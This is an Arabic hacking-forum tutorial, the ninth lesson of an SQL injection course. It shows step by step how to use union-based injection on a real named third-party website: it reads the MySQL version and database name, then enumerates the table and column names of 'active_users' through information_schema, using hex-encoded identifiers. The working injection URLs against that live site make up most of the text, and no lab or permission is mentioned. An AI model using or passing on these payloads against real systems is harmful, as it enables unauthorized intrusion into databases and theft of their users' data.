[الدرس التاسع] شرح إستخراج اسماء الجداول والأعمده

[ASDELY-ScOrPiOn]

دورة SQL injection , sql injection , دورة الحقن , شرح دورة الحقن , شرح sql injection , شرح دورة sql injection , الدرس التاسع من دورة sql injection الحقن ، دورة الحقن , شرح حقن القواعد ، استخراج بيانات الأعمده

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

درس اليوم تطبيق للدرس السابع! ، وفي هذا الدرس رح اقوم بإستخراج معلومات من قاعدة بيانات!

الدرس ثقيل شويّ وصعب على المبتدأين وعلى الاشخاص اللي ما تابعوا الدروس السابقه بحق ، على شان هيك شرحته كتابه + فيديو على السريع للتوضيح!

ملاحظة:- قبل استخدام ال information_schema يجب فحص اصدار قواعد البيانات للسيرفر ، لانه هذه الخدمه غير متوفره بالإصدارات القديمه مثل الإصدار الرابع
اذا طلع الإصدار هو الإصدار الخامس معناتوا بتقدر تطبق الطريقه
لإستخراج اصدار قواعد البيانات في السيرفر ننفذ الامر version()
راجع الدرس السادس! لانه ضروري

طيب...! ، خطوات العمل في الدرس

في هذا الدرس رح نستخرج جداول وحقول في احدى القواعد على احدى المواقع والخطوات ستكون كالتالي
1 - رح نفحص اذا الإصدار حق قواعد البيانات هو الإصدار الخامس ام لا >>> اذا طلع اقل من 5 معناتو الطريقة ما بتنفع على السيرفر ، ملاحظة: معظم السيرفرات ويمكن 90% منها تستعمل اصدار الخامس!
2 - رح نستخرج اسم قاعدة البيانات حتى نستخرج منها الجداول
3 - رح نستخرج الجداول ، ونختار احد الجداول ونستخرج الحقول اللي داخلها!

رح يكون تطبيقنا على هذا الموقع

كود:

http://english.katif.net/index.php?sub=-7+union+select+1,2,3,4,5,6,7,8--

طبعا تم شرح الدرس فيديو كمان حتى توضح الصوره!

طيب ظهر لدينا انه الاعمده المصابه في الموقع هي 3 و 4 و 5
طيب نجرب نستخرج اصدار قاعدة البيانات! عن طريق الامر version() ، يصير الرابط كالتالي

كود:

http://english.katif.net/index.php?sub=-7+union+select+1,2,version(),4,5,6,7,8--

رح يظهر لنا الإصدار ، والاصدار في هذا السيرفر هو 5.0.92-community
وهو الإصدار الخامس ويعني الطريقة شغاله على هذا الموقع!

طيب الحين نبي نستخرج اسم قاعدة البيانات في السيرفر ، نضع الامر هذا database() مكان احد الأعمده المصابه ، ويصبح الامر كالتالي

كود:

http://english.katif.net/index.php?sub=-7+union+select+1,2,database(),4,5,6,7,8--

رح يظهر لنا اسم قاعدة البيانات للموقع ، وطلع عندنا هذا
katif_main
طيب الحين نبي نسخرج جداول القاعدة
طيب الان نستخرج الجداول والامر كالتالي

كود:

http://english.katif.net/index.php?sub=-7+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables--

طيب group_concat بعتقد لازم صرتوا تعرفوها! ، راجع الدرس السابق (الثامن)
طيب table_name وش تعني؟! ، اذا مو متذكر راجع الدرس السابع ورح تتذكر انه يوجد قاعدة اسمها information_schema وداخلها جدول اسمه tables وداخله يوجد عامود اسمه table_name
وهذا رابط الدرس
http://www.aljyyosh.com/vb/showthread.php?t=29707
طيب وش تعني from+information_schema.tables وهذه وضحت للامر وين موجود table_name اللي طلبنا إستخراجه وهو من القاعدة اللي اسمها information_schema ثم الجدول اللي داخلها اللي اسمه tables

طيب بالأمر اللي فوق طلع لنا اسماء الجداول ، طيب بس بالامر اللي فوق بطلع لنا كل اسماء الجداول لكل القواعد البيانات وبطلع معنا اسماء جداول قاعدة information_schema وهاي القاعدة جداولها كثيره وما بهمنا نستخرجهم كلهم ، على شان هيك بدنا نحدد يطلع الجداول لأي قاعدة ونحن نريده ان يطلع لنا الجداول حق القاعدة katif_main اللي استخرجنا في اول الشرح
رح نعدل على الامر ويصير هيك

كود:

http://english.katif.net/index.php?sub=-7+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+where+table_schema+like+0x6b617469665f6d61696e--

رح نوضح الامر! ، طبعا القسم الاول من الامر واضح ، اما القسم الثاني وهو
where+table_schema+like+0x6b617469665f6d61696e
في الدرس الاول شرحنا عن ال where ، وهين احنا عملنا شرط ، وقلنا له اسخرج اسماء الجداول من الجدول اللي اسمه tables الموجود في القاعدة information_schema عندما يكون table_schema يساوي 0x6b617469665f6d61696e
و table_schema وهي العامود اللي فيه اسم القاعدة حق الجدول
هذه 0x6b617469665f6d61696e تعني اسم القاعدة واللي هي katif_main ، بس احنى هون قمنا بتشفيرها
البعض يسأل كيف شفرتها! ، بقول له بسيطه جدا بإمكانك تشفيرها عن طريق برامج او عن طريق مواقع او عن طريق اداة خاصه ، بس انا رح اشفرها عن طريق احد المواقع
ندخل الى الموقع
http://www.waraxe.us/sql-char-encoder.html
وفي المربع الأول الكبير نكتب الكلمة الذي تريد تشفيرها وهي katif_main ومن ثم تضغط Encode Now!
بعدها سيظهر في المربع MySql hex-encoded string التشفير حق الكلمه

هيك صار واضح الامر ، طيب طلع عندنا اسم الجداول ، واحنى نختار جدول معيّن ، حتى نستخرج القواعد منه، نختار مثلا جدول واللي هو active_users

طيب نشفره في البداية عن طريق الموقع ، ثم نعدل الامر ، جرب في البداية عدله لوحدك واستخرج الاعمده اللي داخله ، واذا ما عرفت شوف الأمر التالي

كود:

http://english.katif.net/index.php?sub=-7+union+select+1,2,group_concat(column_name),4,5,6,7,8+from+information_schema.columns+where+table_name+like+0x6163746976655f7573657273--

شوف شو عدلنا في الامر ، فقط اشياء بسيطه

بما اننا بدنا نستخرج اسماء الاعمده اكيد رح نحدد انه يجيب من الجدول اللي اسمه columns اللي موجود داخل information_schema
واكيد اننا بدنا نحط column_name مكان العامود المصاب حتى نخبره انه يجيب لنا الاعمده مو الجداول ! ...
واكيد بدنا نعدل على الشرط اللي هو where+table_name+like من شان نحدد انه يستخرج عندما يكون اسم الجدول للأعمده يساوي 0x6163746976655f7573657273


والله عارف انكم مش فاهمين اشي! واللي نبر نبر ، على شان هيك عملت شرح فيديو على السريع!

تحميل الشرح من عدة سيرفرات


http://www.zshare.net/download/98929310183a1c62/

او



http://depositfiles.com/files/e87ko0i9m

او

https://www.rapidshare.com/files/303...njection_9.zip

او


http://www.filefactory.com/file/c2e8...njection_9.zip

او

http://www.mediafire.com/?uyenpu6w1z8rg0g

او

http://www.megashare.com/3875662

او

http://www.ziddu.com/download/184048...ion_9.zip.html

او

http://ifile.it/yxiw4ev/aljyyosh_sql_injection_9.zip

او

http://www.fileserve.com/file/DVw7sNw



وأذا في شيء غيّر واضح ارجوا تنبيهي حتى اضيفه للدرس

بالتوفيق للجميع

اخوكم ASDELY-ScOrPiOn من منتديات جيوش الهكرز و ASDELY.NET